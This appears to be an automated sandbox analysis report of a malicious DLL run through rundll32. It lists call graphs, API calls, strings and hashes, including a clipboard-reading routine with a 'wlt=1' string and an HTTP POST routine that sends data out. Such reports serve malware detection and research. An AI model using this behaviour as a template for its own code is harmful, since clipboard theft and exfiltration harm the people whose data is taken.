__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 8021->8022 8023 6e22960b GetCurrentProcess TerminateProcess 8022->8023 8023->8011 8029 6e225ca0 8024->8029 8027 6e227103 CallUnexpected RaiseException 8028 6e225d60 8027->8028 8032 6e225c50 8029->8032 8033 6e227081 ___std_exception_copy 25 API calls 8032->8033 8034 6e225c7c 8033->8034 8034->8027 8036 6e229b00 8035->8036 8037 6e229b0e __fassign 8035->8037 8040 6e229ab9 8036->8040 8037->7907 8045 6e229952 8040->8045 8044 6e229add 8044->7907 8046 6e229972 8045->8046 8052 6e229969 8045->8052 8046->8052 8059 6e22af5c GetLastError 8046->8059 8053 6e229a3b 8052->8053 8054 6e229a78 8053->8054 8056 6e229a48 8053->8056 8255 6e22b1ae 8054->8255 8058 6e229a57 __fassign 8056->8058 8248 6e22b1d2 8056->8248 8058->8044 8060 6e22af73 8059->8060 8061 6e22af79 8059->8061 8062 6e22cce9 __dosmaperr 6 API calls 8060->8062 8063 6e22cd28 __dosmaperr 6 API calls 8061->8063 8084 6e22af7f SetLastError 8061->8084 8062->8061 8064 6e22af97 8063->8064 8065 6e22b542 __dosmaperr 14 API calls 8064->8065 8064->8084 8066 6e22afa7 8065->8066 8068 6e22afc6 8066->8068 8069 6e22afaf 8066->8069 8074 6e22cd28 __dosmaperr 6 API calls 8068->8074 8072 6e22cd28 __dosmaperr 6 API calls 8069->8072 8070 6e22b013 8094 6e22aa8c 8070->8094 8071 6e229992 8086 6e22b329 8071->8086 8075 6e22afbd 8072->8075 8077 6e22afd2 8074->8077 8080 6e22b59f _free 14 API calls 8075->8080 8078 6e22afd6 8077->8078 8079 6e22afe7 8077->8079 8081 6e22cd28 __dosmaperr 6 API calls 8078->8081 8082 6e22ad5e __dosmaperr 14 API calls 8079->8082 8080->8084 8081->8075 8083 6e22aff2 8082->8083 8085 6e22b59f _free 14 API calls 8083->8085 8084->8070 8084->8071 8085->8084 8087 6e2299a8 8086->8087 8088 6e22b33c 8086->8088 8090 6e22b356 8087->8090 8088->8087 8205 6e22dcd9 8088->8205 8091 6e22b37e 8090->8091 8092 6e22b369 8090->8092 8091->8052 8092->8091 8227 6e22c514 8092->8227 8105 6e22d21c 8094->8105 8098 6e22aaa6 IsProcessorFeaturePresent 8099 6e22aab2 8098->8099 8102 6e2294d4 IsInExceptionSpec 8 API calls 8099->8102 8101 6e22aa9c 8101->8098 8104 6e22aac5 8101->8104 8102->8104 8135 6e229fd5 8104->8135 8138 6e22d14e 8105->8138 8108 6e22d26a 8109 6e22d276 CallCatchBlock 8108->8109 8110 6e22b0b3 __dosmaperr 14 API calls 8109->8110 8114 6e22d2a3 IsInExceptionSpec 8109->8114 8115 6e22d29d IsInExceptionSpec 8109->8115 8110->8115 8111 6e22d2e8 8112 6e22b316 __dosmaperr 14 API calls 8111->8112 8113 6e22d2ed 8112->8113 8116 6e229680 ___std_exception_copy 25 API calls 8113->8116 8118 6e22d314 8114->8118 8149 6e22b464 EnterCriticalSection 8114->8149 8115->8111 8115->8114 8134 6e22d2d2 8115->8134 8116->8134 8120 6e22d451 8118->8120 8121 6e22d35c 8118->8121 8131 6e22d387 8118->8131 8123 6e22d45c 8120->8123 8157 6e22b4ac LeaveCriticalSection 8120->8157 8121->8131 8150 6e22d261 8121->8150 8125 6e229fd5 IsInExceptionSpec 23 API calls 8123->8125 8127 6e22d464 8125->8127 8128 6e22af5c _unexpected 37 API calls 8132 6e22d3db 8128->8132 8130 6e22d261 IsInExceptionSpec 37 API calls 8130->8131 8153 6e22d3fd 8131->8153 8133 6e22af5c _unexpected 37 API calls 8132->8133 8132->8134 8133->8134 8134->8101 8159 6e229e7b 8135->8159 8139 6e22d15a CallCatchBlock 8138->8139 8144 6e22b464 EnterCriticalSection 8139->8144 8141 6e22d168 8145 6e22d1a6 8141->8145 8144->8141 8148 6e22b4ac LeaveCriticalSection 8145->8148 8147 6e22aa91 8147->8101 8147->8108 8148->8147 8149->8118 8151 6e22af5c _unexpected 37 API calls 8150->8151 8152 6e22d266 8151->8152 8152->8130 8154 6e22d403 8153->8154 8156 6e22d3cc 8153->8156 8158 6e22b4ac LeaveCriticalSection 8154->8158 8156->8128 8156->8132 8156->8134 8157->8123 8158->8156 8160 6e229e89 8159->8160 8169 6e229e9a 8159->8169 8170 6e229f21 GetModuleHandleW 8160->8170 8165 6e229ed4 8177 6e229d41 8169->8177 8171 6e229e8e 8170->8171 8171->8169 8172 6e229f64 GetModuleHandleExW 8171->8172 8173 6e229f83 GetProcAddress 8172->8173 8176 6e229f98 8172->8176 8173->8176 8174 6e229fb5 8174->8169 8175 6e229fac FreeLibrary 8175->8174 8176->8174 8176->8175 8178 6e229d4d CallCatchBlock 8177->8178 8193 6e22b464 EnterCriticalSection 8178->8193 8180 6e229d57 8194 6e229d8e 8180->8194 8182 6e229d64 8198 6e229d82 8182->8198 8185 6e229edf 8201 6e22b511 GetPEB 8185->8201 8188 6e229f0e 8191 6e229f64 IsInExceptionSpec 3 API calls 8188->8191 8189 6e229eee GetPEB 8189->8188 8190 6e229efe GetCurrentProcess TerminateProcess 8189->8190 8190->8188 8192 6e229f16 ExitProcess 8191->8192 8193->8180 8195 6e229d9a CallCatchBlock 8194->8195 8196 6e22a7d4 IsInExceptionSpec 14 API calls 8195->8196 8197 6e229dfb IsInExceptionSpec 8195->8197 8196->8197 8197->8182 8199 6e22b4ac IsInExceptionSpec LeaveCriticalSection 8198->8199 8200 6e229d70 8199->8200 8200->8165 8200->8185 8202 6e229ee9 8201->8202 8203 6e22b52b 8201->8203 8202->8188 8202->8189 8204 6e22cc0c IsInExceptionSpec 5 API calls 8203->8204 8204->8202 8206 6e22dce5 CallCatchBlock 8205->8206 8207 6e22af5c _unexpected 37 API calls 8206->8207 8208 6e22dcee 8207->8208 8215 6e22dd34 8208->8215 8218 6e22b464 EnterCriticalSection 8208->8218 8210 6e22dd0c 8219 6e22dd5a 8210->8219 8215->8087 8216 6e22aa8c IsInExceptionSpec 37 API calls 8217 6e22dd59 8216->8217 8218->8210 8220 6e22dd1d 8219->8220 8221 6e22dd68 __fassign 8219->8221 8223 6e22dd39 8220->8223 8221->8220 8222 6e22da8d __fassign 14 API calls 8221->8222 8222->8220 8226 6e22b4ac LeaveCriticalSection 8223->8226 8225 6e22dd30 8225->8215 8225->8216 8226->8225 8228 6e22af5c _unexpected 37 API calls 8227->8228 8229 6e22c51e 8228->8229 8232 6e22c42c 8229->8232 8233 6e22c438 CallCatchBlock 8232->8233 8234 6e22c452 8233->8234 8243 6e22b464 EnterCriticalSection 8233->8243 8236 6e22c459 8234->8236 8238 6e22aa8c IsInExceptionSpec 37 API calls 8234->8238 8236->8091 8237 6e22c48e 8244 6e22c4ab 8237->8244 8240 6e22c4cb 8238->8240 8241 6e22c462 8241->8237 8242 6e22b59f _free 14 API calls 8241->8242 8242->8237 8243->8241 8247 6e22b4ac LeaveCriticalSection 8244->8247 8246 6e22c4b2 8246->8234 8247->8246 8249 6e229952 __fassign 37 API calls 8248->8249 8250 6e22b1ef 8249->8250 8253 6e22b1ff 8250->8253 8260 6e22ddaa 8250->8260 8252 6e225d81 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 8254 6e22b29b 8252->8254 8253->8252 8254->8058 8256 6e22af5c _unexpected 37 API calls 8255->8256 8257 6e22b1b9 8256->8257 8258 6e22b329 __fassign 37 API calls 8257->8258 8259 6e22b1c9 8258->8259 8259->8058 8261 6e229952 __fassign 37 API calls 8260->8261 8262 6e22ddca 8261->8262 8275 6e22c823 8262->8275 8264 6e22de88 8265 6e225d81 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 8264->8265 8268 6e22deab 8265->8268 8266 6e22ddf7 8266->8264 8271 6e22de1d ___scrt_fastfail 8266->8271 8278 6e22b4c3 8266->8278 8268->8253 8269 6e22de82 8285 6e22dead 8269->8285 8271->8269 8272 6e22c823 __fassign MultiByteToWideChar 8271->8272 8273 6e22de6b 8272->8273 8273->8269 8274 6e22de72 GetStringTypeW 8273->8274 8274->8269 8276 6e22c834 MultiByteToWideChar 8275->8276 8276->8266 8279 6e22b501 8278->8279 8283 6e22b4d1 __dosmaperr 8278->8283 8280 6e22b316 __dosmaperr 14 API calls 8279->8280 8282 6e22b4ff 8280->8282 8281 6e22b4ec RtlAllocateHeap 8281->8282 8281->8283 8282->8271 8283->8279 8283->8281 8284 6e229b35 __dosmaperr 2 API calls 8283->8284 8284->8283 8286 6e22deca 8285->8286 8287 6e22deb9 8285->8287 8286->8264 8287->8286 8288 6e22b59f _free 14 API calls 8287->8288 8288->8286 8290 6e2257f9 8289->8290 8292 6e2256f3 8289->8292 8291 6e225ad0 26 API calls 8290->8291 8293 6e2257fe 8291->8293 8294 6e225735 8292->8294 8295 6e22575f 8292->8295 8296 6e221260 Concurrency::cancel_current_task 26 API calls 8293->8296 8294->8293 8297 6e225740 8294->8297 8299 6e225dc3 26 API calls 8295->8299 8302 6e225746 ___scrt_uninitialize_crt 8295->8302 8296->8302 8298 6e225dc3 26 API calls 8297->8298 8298->8302 8299->8302 8300 6e229690 25 API calls 8301 6e225808 8300->8301 8302->8300 8303 6e2257bb ___scrt_uninitialize_crt 8302->8303 8303->7917 8304->7925 7880 6e22b4c3 7881 6e22b501 7880->7881 7885 6e22b4d1 __dosmaperr 7880->7885 7882 6e22b316 __dosmaperr 14 API calls 7881->7882 7884 6e22b4ff 7882->7884 7883 6e22b4ec RtlAllocateHeap 7883->7884 7883->7885 7885->7881 7885->7883 7886 6e229b35 __dosmaperr 2 API calls 7885->7886 7886->7885

                                                                                              Executed Functions

                                                                                              Function 6E222580 Relevance: 18.0, APIs: 7, Strings: 3, Instructions: 485COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 117 6e222580-6e22276e 121 6e2227a3-6e2227bf call 6e225d81 117->121 122 6e222770-6e22277c 117->122 123 6e222799-6e2227a0 call 6e225d92 122->123 124 6e22277e-6e22278c 122->124 123->121 124->123 127 6e2227c0-6e2228af call 6e229690 call 6e2254c0 call 6e225380 124->127 137 6e2228b1-6e2228bd 127->137 138 6e2228d9-6e2228ec 127->138 139 6e2228cf-6e2228d6 call 6e225d92 137->139 140 6e2228bf-6e2228cd 137->140 139->138 140->139 141 6e2228ed-6e222a7a call 6e229690 call 6e225380 140->141 151 6e222a7c-6e222a88 141->151 152 6e222add-6e222af9 call 6e225d81 141->152 153 6e222ad3-6e222ada call 6e225d92 151->153 154 6e222a8a-6e222a98 151->154 153->152 154->153 156 6e222afa-6e222bd3 call 6e229690 call 6e2254c0 call 6e225640 154->156 167 6e222bd5-6e222be1 156->167 168 6e222bfd-6e222c0e 156->168 169 6e222bf3-6e222bfa call 6e225d92 167->169 170 6e222be3-6e222bf1 167->170 169->168 170->169 171 6e222c0f-6e222c7f call 6e229690 OpenClipboard 170->171 176 6e222c85-6e222c94 GetClipboardData 171->176 177 6e222e2e-6e222e40 171->177 178 6e222c9a-6e222ca6 GlobalLock 176->178 179 6e222e28 CloseClipboard 176->179 180 6e222e21-6e222e22 GlobalUnlock 178->180 181 6e222cac-6e222ccb WideCharToMultiByte 178->181 179->177 180->179 181->180 182 6e222cd1-6e222df7 call 6e225810 WideCharToMultiByte call 6e225380 181->182 182->180 192 6e222df9-6e222e05 182->192 193 6e222e17-6e222e1e call 6e225d92 192->193 194 6e222e07-6e222e15 192->194 193->180 194->193 196 6e222e41-6e222f17 call 6e229690 call 6e225380 call 6e225170 * 2 call 6e221300 call 6e225170 call 6e225380 call 6e222580 194->196
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: +++$abcdefghijklmnopqrstuvwxyz0123456789$wlt=1
                                                                                              • API String ID: 0-2251221455
                                                                                              • Opcode ID: 013213c981f80acb8256ce47782d24cb77ed2f7ce59fa393259895b1639a3278
                                                                                              • Instruction ID: 10773b2bb8fd57cfb782377298ea2dfe9fb9270938a2e447a0b026350f13ffb1
                                                                                              • Opcode Fuzzy Hash: 013213c981f80acb8256ce47782d24cb77ed2f7ce59fa393259895b1639a3278
                                                                                              • Instruction Fuzzy Hash: 5CF11AB1A1020DAFEB14CFE8CC44B9EBBBAEB45714F104629F811AB7C4D7759944CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E221300 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 393networkfileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 6e221300-6e22134c 1 6e221352-6e221356 0->1 2 6e22184a-6e22186f call 6e225380 0->2 1->2 3 6e22135c-6e221360 1->3 7 6e221871-6e22187d 2->7 8 6e221899-6e2218b1 2->8 3->2 6 6e221366-6e22146f call 6e225380 InternetOpenW InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile 3->6 17 6e221681-6e2216e4 InternetCloseHandle * 3 6->17 18 6e221475 6->18 10 6e22188f-6e221896 call 6e225d92 7->10 11 6e22187f-6e22188d 7->11 13 6e221801-6e221819 8->13 14 6e2218b7-6e2218c3 8->14 10->8 11->10 15 6e221905 call 6e229690 11->15 21 6e2218e8-6e221904 call 6e225d81 13->21 22 6e22181f-6e22182b 13->22 19 6e2217f7-6e2217fe call 6e225d92 14->19 20 6e2218c9-6e2218d7 14->20 33 6e22190a-6e22190f call 6e22622e 15->33 24 6e2216e6-6e2216f5 17->24 25 6e22171b-6e221739 17->25 27 6e221480-6e221487 18->27 19->13 20->15 29 6e2218d9 20->29 30 6e221831-6e22183f 22->30 31 6e2218de-6e2218e5 call 6e225d92 22->31 34 6e2216f7-6e221705 24->34 35 6e22170b-6e221718 call 6e225d92 24->35 38 6e22173b-6e22174c 25->38 39 6e22176c-6e22178d 25->39 36 6e22167b 27->36 37 6e22148d-6e2214aa 27->37 29->19 30->15 42 6e221845 30->42 31->21 34->15 34->35 35->25 36->17 46 6e2214b1-6e2214b6 37->46 47 6e221762-6e221769 call 6e225d92 38->47 48 6e22174e-6e22175c 38->48 50 6e2217bb-6e2217d3 39->50 51 6e22178f-6e22179b 39->51 42->31 46->46 57 6e2214b8-6e22155d call 6e225380 * 2 46->57 47->39 48->15 48->47 50->13 55 6e2217d5-6e2217e1 50->55 52 6e2217b1-6e2217b8 call 6e225d92 51->52 53 6e22179d-6e2217ab 51->53 52->50 53->15 53->52 55->19 60 6e2217e3-6e2217f1 55->60 67 6e2215a2-6e2215bc call 6e225970 57->67 68 6e22155f-6e2215a0 call 6e2288a0 57->68 60->15 60->19 73 6e2215c2-6e2215cf 67->73 68->73 74 6e2215d1-6e2215dc 73->74 75 6e2215fc-6e221609 73->75 76 6e2215f2-6e2215f9 call 6e225d92 74->76 77 6e2215de-6e2215ec 74->77 78 6e22163a-6e221645 75->78 79 6e22160b-6e22161a 75->79 76->75 77->15 77->76 78->33 80 6e22164b-6e221675 InternetReadFile 78->80 82 6e221630-6e221637 call 6e225d92 79->82 83 6e22161c-6e22162a 79->83 80->27 80->36 82->78 83->15 83->82
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(6E238DB4,00000000,00000000,00000000,00000000), ref: 6E2213C3
                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 6E2213EA
                                                                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000001), ref: 6E221414
                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,?,00000000), ref: 6E22144D
                                                                                              • InternetReadFile.WININET(00000000,?,000003FF,?), ref: 6E221467
                                                                                              • InternetReadFile.WININET(?,00000000,000003FF,00000000), ref: 6E22166D
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 6E221688
                                                                                              • InternetCloseHandle.WININET(?), ref: 6E221690
                                                                                              • InternetCloseHandle.WININET(?), ref: 6E221698
                                                                                              Strings
                                                                                              • POST, xrefs: 6E22140E
                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 6E22138D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                                                                                              • String ID: Content-Type: application/x-www-form-urlencoded$POST
                                                                                              • API String ID: 1354133546-2387545335
                                                                                              • Opcode ID: d8aa85fbbd6c42d3973fec49aafb0ed79c73ace52ea4f5fc1b872bbd68c83d94
                                                                                              • Instruction ID: 551e08cd6c00d3171a2cb4d84f57a2c1e6a091e91bfbedfc37218417aebfe95d
                                                                                              • Opcode Fuzzy Hash: d8aa85fbbd6c42d3973fec49aafb0ed79c73ace52ea4f5fc1b872bbd68c83d94
                                                                                              • Instruction Fuzzy Hash: 0AF1A2B0A0015D9FEB25CF68CC84BDDBB7AAF45304F5081E8E609A7281D7759AC8CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22646B Relevance: 13.6, APIs: 9, Instructions: 134COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __RTC_Initialize.LIBCMT ref: 6E2264B2
                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6E2264CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                              • String ID:
                                                                                              • API String ID: 2442719207-0
                                                                                              • Opcode ID: 9dacd56edbd4c239a820251979d2e527f710e449aae2943e57342a724d043fe6
                                                                                              • Instruction ID: dd48e82eeb6d48d5421689940e8aef87f971530eacb1a4c326e684d0e2be2bed
                                                                                              • Opcode Fuzzy Hash: 9dacd56edbd4c239a820251979d2e527f710e449aae2943e57342a724d043fe6
                                                                                              • Instruction Fuzzy Hash: 2A41A1B3D2561EAFDB208FE5CC80BAE7B7BEB85755F004539E81466254D7348D118BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22B0B3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00000001,6E22B31B,6E22B5C5,?,?,6E22A79C), ref: 6E22B0B8
                                                                                              • _free.LIBCMT ref: 6E22B115
                                                                                              • _free.LIBCMT ref: 6E22B14B
                                                                                              • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000001,6E22B31B,6E22B5C5,?,?,6E22A79C), ref: 6E22B156
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_free
                                                                                              • String ID:
                                                                                              • API String ID: 2283115069-0
                                                                                              • Opcode ID: c17f81eceb1ccfb1c6e9d44202d8d4aaa09c823fba3022698b008b99ddf41de0
                                                                                              • Instruction ID: f696eb0edd98d41b644778e0b249c4f32b8f29f5152b6a370711b18cd750cec8
                                                                                              • Opcode Fuzzy Hash: c17f81eceb1ccfb1c6e9d44202d8d4aaa09c823fba3022698b008b99ddf41de0
                                                                                              • Instruction Fuzzy Hash: 8911C636354A0E2FD7311AF54D85E5A275F9BC677AB240634F134AB1D8EEA18C018920
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E225DC3 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6E22129E
                                                                                                • Part of subcall function 6E227103: RaiseException.KERNEL32(E06D7363,00000001,00000003,6E22127C,?,?,?,6E22127C,?,6E23A008), ref: 6E227163
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise___std_exception_copy
                                                                                              • String ID:
                                                                                              • API String ID: 3109751735-0
                                                                                              • Opcode ID: 8acce147fcc0b5d603be76662123911f09a5b5038edc87bf100c348e8ce804db
                                                                                              • Instruction ID: 4c450fd8b66ec89198b0dc004ff81613c79dd08dcf85736a5bd2d45fb86c67da
                                                                                              • Opcode Fuzzy Hash: 8acce147fcc0b5d603be76662123911f09a5b5038edc87bf100c348e8ce804db
                                                                                              • Instruction Fuzzy Hash: 6301267980420E7FCB00DBE4DC04CC9B76E9E01228B508A35FA24EA580FB30E59587D6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22B542 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 316 6e22b542-6e22b54d 317 6e22b55b-6e22b561 316->317 318 6e22b54f-6e22b559 316->318 320 6e22b563-6e22b564 317->320 321 6e22b57a-6e22b58b RtlAllocateHeap 317->321 318->317 319 6e22b58f-6e22b59a call 6e22b316 318->319 325 6e22b59c-6e22b59e 319->325 320->321 322 6e22b566-6e22b56d call 6e22e150 321->322 323 6e22b58d 321->323 322->319 329 6e22b56f-6e22b578 call 6e229b35 322->329 323->325 329->319 329->321
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E22B0FE,00000001,00000364,00000006,000000FF,?,00000001,6E22B31B,6E22B5C5,?,?,6E22A79C), ref: 6E22B583
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: edfa425b42965ee22f176e46ead743065a8bd86c22ec033c70083c804f32b57a
                                                                                              • Instruction ID: 0eb07b1789eb73344ef4178f372bbb175b805618292de3fca3a4c08e3247928a
                                                                                              • Opcode Fuzzy Hash: edfa425b42965ee22f176e46ead743065a8bd86c22ec033c70083c804f32b57a
                                                                                              • Instruction Fuzzy Hash: C9F0B43165462E9FEB624EF68C14B9A375FAB45761B004531A8189F188CB20D92086A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6E22B4C3 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 332 6e22b4c3-6e22b4cf 333 6e22b501-6e22b50c call 6e22b316 332->333 334 6e22b4d1-6e22b4d3 332->334 341 6e22b50e-6e22b510 333->341 336 6e22b4d5-6e22b4d6 334->336 337 6e22b4ec-6e22b4fd RtlAllocateHeap 334->337 336->337 338 6e22b4d8-6e22b4df call 6e22e150 337->338 339 6e22b4ff 337->339 338->333 344 6e22b4e1-6e22b4ea call 6e229b35 338->344 339->341 344->333 344->337
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,558B0000,558B0000,?,6E22C350,00000220,6E22EEF8,558B0000,?,?,?,?,00000000,00000000,?,6E22EEF8), ref: 6E22B4F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6E220000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.2870546109.000000006E220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870603275.000000006E234000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870632214.000000006E23B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 0000000A.00000002.2870660951.000000006E23D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_6e220000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 71407c1d32b627619793909703b0f3f885b0b26cafa7efbf843376d91996f711
                                                                                              • Instruction ID: feeaabe74458240253e101f65c67c521b48ef6a2113db7b0a436d584a1879025
                                                                                              • Opcode Fuzzy Hash: 71407c1d32b627619793909703b0f3f885b0b26cafa7efbf843376d91996f711
                                                                                              • Instruction Fuzzy Hash: 5DE0ED3562022F6FEA6216F68C64B8B3A4FDB467A1F000931BC199E188DF61C950C2B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 6E22BA2F Relevance: 9.2, APIs: 6, Instructions: 194fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6E22BB1F
                                                                                              • _free.LIBCMT ref: 6E22BBEF
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 6E22BBFD
                                                                                              • _free.LIBCMT ref: 6E22BC4B
                                                                                              • FindClose.KERNEL32(00000000), ref: 6E22BC5A
                                                                                              • _free.LIBCMT ref: 6E22BC70
